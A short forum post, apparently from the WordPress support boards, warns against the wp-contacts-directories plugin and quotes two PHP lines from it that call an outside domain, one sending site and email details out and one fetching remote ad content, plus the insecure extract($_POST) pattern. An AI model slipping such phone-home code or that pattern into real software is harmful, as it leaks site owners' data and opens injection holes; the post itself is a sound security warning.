Security alert wp-contacts-directories plugin (1 post)

  1. chouf1
    Posted 5 years ago #

    Hi WP people,

    i want to warn you against wp-contacts-directories plugin. I you already use it, uninstall it.

    If you know what you do, take care of it because this plugin contains many security holes (for ex. extract($_POST);...) and a spy code line 556 to 562 who contains something like this:

    $res = file_get_contents("http://ahlul.web.id/tools/plugcheck/?n=$n&h=$h&m=$e");

    in another if statement, line 577, we find :
    $output = file_get_contents("http://ahlul.web.id/tools/plugads/wpcontact.php");

    This is illegal as far as i know...

    Anyway this is a perfect example of what not to do in matter of security, php and open source coding.

Topic Closed

This topic has been closed to new replies.

About this Topic